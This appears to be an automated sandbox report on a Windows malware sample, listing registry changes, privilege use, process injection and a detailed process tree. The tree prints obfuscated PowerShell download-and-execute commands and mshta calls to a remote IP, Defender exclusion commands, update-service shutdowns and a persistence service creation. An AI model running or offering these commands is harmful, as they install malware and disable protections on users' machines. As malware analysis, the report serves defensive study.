Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
6484	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
5920	document.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2756	9b73356104654687374dfab3c5554e15dfb402a1089750d9c431e1c4964de8cb.exe
2756	9b73356104654687374dfab3c5554e15dfb402a1089750d9c431e1c4964de8cb.exe
1004	skotes.exe
1004	skotes.exe
2288	powershell.exe
4884	powershell.exe
2288	powershell.exe
4884	powershell.exe
3380	powershell.exe
3380	powershell.exe
3496	powershell.exe
3496	powershell.exe
4676	powershell.exe
4676	powershell.exe
4676	powershell.exe
7160	powershell.exe
7160	powershell.exe
7160	powershell.exe
6460	powershell.exe
6460	powershell.exe
6460	powershell.exe
5832	powershell.exe
5832	powershell.exe
5832	powershell.exe
5920	document.exe
5920	document.exe
6140	FunnyJellyfish.tmp
6140	FunnyJellyfish.tmp
4128	regsvr32.exe
4128	regsvr32.exe
4128	regsvr32.exe
4128	regsvr32.exe
4128	regsvr32.exe
4128	regsvr32.exe
6664	powershell.exe
6664	powershell.exe
6664	powershell.exe
5696	powershell.exe
5696	powershell.exe
5696	powershell.exe
4128	regsvr32.exe
4128	regsvr32.exe
4128	regsvr32.exe
4128	regsvr32.exe
4128	regsvr32.exe
4128	regsvr32.exe
2232	8214b4dbe2.exe
2232	8214b4dbe2.exe
4128	regsvr32.exe
1300	c145410f7e.exe
1300	c145410f7e.exe
1432	5948d66f9b.exe
1432	5948d66f9b.exe
4344	LB31.exe
4208	powershell.exe
4208	powershell.exe
4208	powershell.exe
4344	LB31.exe
4344	LB31.exe
4344	LB31.exe
4344	LB31.exe
4344	LB31.exe
4344	LB31.exe
4344	LB31.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeDebugPrivilege	4884	powershell.exe
Token: SeDebugPrivilege	2312	RegSvcs.exe
Token: SeDebugPrivilege	3380	powershell.exe
Token: SeDebugPrivilege	3496	powershell.exe
Token: SeDebugPrivilege	5920	document.exe
Token: SeDebugPrivilege	4676	powershell.exe
Token: SeDebugPrivilege	7160	powershell.exe
Token: SeDebugPrivilege	6460	powershell.exe
Token: SeDebugPrivilege	5832	powershell.exe
Token: SeDebugPrivilege	5920	document.exe
Token: SeDebugPrivilege	6664	powershell.exe
Token: SeIncreaseQuotaPrivilege	6664	powershell.exe
Token: SeSecurityPrivilege	6664	powershell.exe
Token: SeTakeOwnershipPrivilege	6664	powershell.exe
Token: SeLoadDriverPrivilege	6664	powershell.exe
Token: SeSystemProfilePrivilege	6664	powershell.exe
Token: SeSystemtimePrivilege	6664	powershell.exe
Token: SeProfSingleProcessPrivilege	6664	powershell.exe
Token: SeIncBasePriorityPrivilege	6664	powershell.exe
Token: SeCreatePagefilePrivilege	6664	powershell.exe
Token: SeBackupPrivilege	6664	powershell.exe
Token: SeRestorePrivilege	6664	powershell.exe
Token: SeShutdownPrivilege	6664	powershell.exe
Token: SeDebugPrivilege	6664	powershell.exe
Token: SeSystemEnvironmentPrivilege	6664	powershell.exe
Token: SeRemoteShutdownPrivilege	6664	powershell.exe
Token: SeUndockPrivilege	6664	powershell.exe
Token: SeManageVolumePrivilege	6664	powershell.exe
Token: 33	6664	powershell.exe
Token: 34	6664	powershell.exe
Token: 35	6664	powershell.exe
Token: 36	6664	powershell.exe
Token: SeDebugPrivilege	5696	powershell.exe
Token: SeIncreaseQuotaPrivilege	5696	powershell.exe
Token: SeSecurityPrivilege	5696	powershell.exe
Token: SeTakeOwnershipPrivilege	5696	powershell.exe
Token: SeLoadDriverPrivilege	5696	powershell.exe
Token: SeSystemProfilePrivilege	5696	powershell.exe
Token: SeSystemtimePrivilege	5696	powershell.exe
Token: SeProfSingleProcessPrivilege	5696	powershell.exe
Token: SeIncBasePriorityPrivilege	5696	powershell.exe
Token: SeCreatePagefilePrivilege	5696	powershell.exe
Token: SeBackupPrivilege	5696	powershell.exe
Token: SeRestorePrivilege	5696	powershell.exe
Token: SeShutdownPrivilege	5696	powershell.exe
Token: SeDebugPrivilege	5696	powershell.exe
Token: SeSystemEnvironmentPrivilege	5696	powershell.exe
Token: SeRemoteShutdownPrivilege	5696	powershell.exe
Token: SeUndockPrivilege	5696	powershell.exe
Token: SeManageVolumePrivilege	5696	powershell.exe
Token: 33	5696	powershell.exe
Token: 34	5696	powershell.exe
Token: 35	5696	powershell.exe
Token: 36	5696	powershell.exe
Token: SeIncreaseQuotaPrivilege	5696	powershell.exe
Token: SeSecurityPrivilege	5696	powershell.exe
Token: SeTakeOwnershipPrivilege	5696	powershell.exe
Token: SeLoadDriverPrivilege	5696	powershell.exe
Token: SeSystemProfilePrivilege	5696	powershell.exe
Token: SeSystemtimePrivilege	5696	powershell.exe
Token: SeProfSingleProcessPrivilege	5696	powershell.exe
Token: SeIncBasePriorityPrivilege	5696	powershell.exe
Token: SeCreatePagefilePrivilege	5696	powershell.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
2756	9b73356104654687374dfab3c5554e15dfb402a1089750d9c431e1c4964de8cb.exe
6140	FunnyJellyfish.tmp
6104	d930301bec.exe
6104	d930301bec.exe
6104	d930301bec.exe
6104	d930301bec.exe
6104	d930301bec.exe
6104	d930301bec.exe
6104	d930301bec.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
6104	d930301bec.exe
6104	d930301bec.exe
6104	d930301bec.exe

Suspicious use of SendNotifyMessage 30 IoCs

pid	Process
6104	d930301bec.exe
6104	d930301bec.exe
6104	d930301bec.exe
6104	d930301bec.exe
6104	d930301bec.exe
6104	d930301bec.exe
6104	d930301bec.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
3660	firefox.exe
6104	d930301bec.exe
6104	d930301bec.exe
6104	d930301bec.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
5920	document.exe
3652	Conhost.exe
3660	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2756 wrote to memory of 1004	2756	9b73356104654687374dfab3c5554e15dfb402a1089750d9c431e1c4964de8cb.exe	82
PID 2756 wrote to memory of 1004	2756	9b73356104654687374dfab3c5554e15dfb402a1089750d9c431e1c4964de8cb.exe	82
PID 2756 wrote to memory of 1004	2756	9b73356104654687374dfab3c5554e15dfb402a1089750d9c431e1c4964de8cb.exe	82
PID 1004 wrote to memory of 4384	1004	skotes.exe	87
PID 1004 wrote to memory of 4384	1004	skotes.exe	87
PID 4384 wrote to memory of 4180	4384	file.exe	88
PID 4384 wrote to memory of 4180	4384	file.exe	88
PID 4180 wrote to memory of 2288	4180	wscript.exe	89
PID 4180 wrote to memory of 2288	4180	wscript.exe	89
PID 4180 wrote to memory of 4884	4180	wscript.exe	90
PID 4180 wrote to memory of 4884	4180	wscript.exe	90
PID 2288 wrote to memory of 3420	2288	powershell.exe	94
PID 2288 wrote to memory of 3420	2288	powershell.exe	94
PID 4884 wrote to memory of 1496	4884	powershell.exe	95
PID 4884 wrote to memory of 1496	4884	powershell.exe	95
PID 3420 wrote to memory of 3324	3420	WScript.exe	96
PID 3420 wrote to memory of 3324	3420	WScript.exe	96
PID 4884 wrote to memory of 2312	4884	powershell.exe	97
PID 4884 wrote to memory of 2312	4884	powershell.exe	97
PID 4884 wrote to memory of 2312	4884	powershell.exe	97
PID 4884 wrote to memory of 2312	4884	powershell.exe	97
PID 4884 wrote to memory of 2312	4884	powershell.exe	97
PID 4884 wrote to memory of 2312	4884	powershell.exe	97
PID 4884 wrote to memory of 2312	4884	powershell.exe	97
PID 4884 wrote to memory of 2312	4884	powershell.exe	97
PID 3324 wrote to memory of 3888	3324	cmd.exe	99
PID 3324 wrote to memory of 3888	3324	cmd.exe	99
PID 3888 wrote to memory of 3380	3888	mshta.exe	100
PID 3888 wrote to memory of 3380	3888	mshta.exe	100
PID 3380 wrote to memory of 3496	3380	powershell.exe	103
PID 3380 wrote to memory of 3496	3380	powershell.exe	103
PID 1004 wrote to memory of 6864	1004	skotes.exe	105
PID 1004 wrote to memory of 6864	1004	skotes.exe	105
PID 1004 wrote to memory of 6864	1004	skotes.exe	105
PID 6864 wrote to memory of 6912	6864	FunnyJellyfish.exe	106
PID 6864 wrote to memory of 6912	6864	FunnyJellyfish.exe	106
PID 6864 wrote to memory of 6912	6864	FunnyJellyfish.exe	106
PID 6912 wrote to memory of 796	6912	FunnyJellyfish.tmp	107
PID 6912 wrote to memory of 796	6912	FunnyJellyfish.tmp	107
PID 6912 wrote to memory of 796	6912	FunnyJellyfish.tmp	107
PID 1004 wrote to memory of 5920	1004	skotes.exe	109
PID 1004 wrote to memory of 5920	1004	skotes.exe	109
PID 796 wrote to memory of 6980	796	cmd.exe	110
PID 796 wrote to memory of 6980	796	cmd.exe	110
PID 796 wrote to memory of 6980	796	cmd.exe	110
PID 5920 wrote to memory of 4676	5920	document.exe	111
PID 5920 wrote to memory of 4676	5920	document.exe	111
PID 5920 wrote to memory of 7160	5920	document.exe	113
PID 5920 wrote to memory of 7160	5920	document.exe	113
PID 5920 wrote to memory of 6460	5920	document.exe	115
PID 5920 wrote to memory of 6460	5920	document.exe	115
PID 5920 wrote to memory of 5832	5920	document.exe	117
PID 5920 wrote to memory of 5832	5920	document.exe	117
PID 796 wrote to memory of 6096	796	cmd.exe	119
PID 796 wrote to memory of 6096	796	cmd.exe	119
PID 796 wrote to memory of 6096	796	cmd.exe	119
PID 6096 wrote to memory of 6140	6096	FunnyJellyfish.exe	120
PID 6096 wrote to memory of 6140	6096	FunnyJellyfish.exe	120
PID 6096 wrote to memory of 6140	6096	FunnyJellyfish.exe	120
PID 6140 wrote to memory of 2616	6140	FunnyJellyfish.tmp	121
PID 6140 wrote to memory of 2616	6140	FunnyJellyfish.tmp	121
PID 6140 wrote to memory of 2616	6140	FunnyJellyfish.tmp	121
PID 2616 wrote to memory of 4128	2616	regsvr32.exe	122
PID 2616 wrote to memory of 4128	2616	regsvr32.exe	122

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1016

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:436

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:696

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1104

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1152
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:392
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:6712
- C:\Windows\system32\regsvr32.EXE
  C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll
  2⤵
  PID:1928
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll' }) { exit 0 } else { exit 1 }"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2220
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  2⤵
  PID:6632
- C:\Users\Admin\AppData\Local\Temp\service123.exe
  C:\Users\Admin\AppData\Local\Temp\/service123.exe
  2⤵
  PID:4472
- C:\Windows\system32\regsvr32.EXE
  C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll
  2⤵
  PID:7116
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\DelightfulCard.dll' }) { exit 0 } else { exit 1 }"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1436
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1568

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1584

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1704

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1876

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1888

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2004

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:884

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2056

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2176

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2212

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2568

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2608

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2628

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3176

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3364

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3456
- C:\Users\Admin\AppData\Local\Temp\9b73356104654687374dfab3c5554e15dfb402a1089750d9c431e1c4964de8cb.exe
  "C:\Users\Admin\AppData\Local\Temp\9b73356104654687374dfab3c5554e15dfb402a1089750d9c431e1c4964de8cb.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:2756
- - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Adds Run key to start application
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1004
  - - C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe
      "C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4384
    - - C:\Windows\SYSTEM32\wscript.exe
        
        "wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4180
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2288
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
        7⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:3420
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3324
        
        C:\Windows\system32\mshta.exe
        
        mshta http://176.113.115.178/Windows-Update
        9⤵
        Blocklisted process makes network request
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:3888
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
        10⤵
        UAC bypass
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3380
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3496
        
        C:\Users\Admin\AppData\Roaming\LB31.exe
        
        "C:\Users\Admin\AppData\Roaming\LB31.exe"
        11⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:4344
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4208
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        12⤵
        
        PID:6256
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        13⤵
        
        PID:4672
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        12⤵
        Launches sc.exe
        
        PID:1468
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        12⤵
        Launches sc.exe
        
        PID:1184
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        12⤵
        Launches sc.exe
        
        PID:6300
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        12⤵
        Launches sc.exe
        
        PID:6088
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        12⤵
        Launches sc.exe
        
        PID:7060
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        12⤵
        Power Settings
        
        PID:5912
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        12⤵
        Power Settings
        
        PID:3696
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        12⤵
        Power Settings
        
        PID:6496
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        12⤵
        Power Settings
        
        PID:6600
        
        C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        12⤵
        
        PID:6048
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "LIB"
        12⤵
        Launches sc.exe
        
        PID:4156
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
        12⤵
        Launches sc.exe
        
        PID:440
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        12⤵
        Launches sc.exe
        
        PID:5548
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "LIB"
        12⤵
        Launches sc.exe
        
        PID:6132
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        13⤵
        
        PID:2076
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4884
        
        C:\Windows\system32\ipconfig.exe
        
        "C:\Windows\system32\ipconfig.exe" /flushdns
        7⤵
        Gathers network information
        
        PID:1496
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        7⤵
        Accesses Microsoft Outlook profiles
        System Location Discovery: System Language Discovery
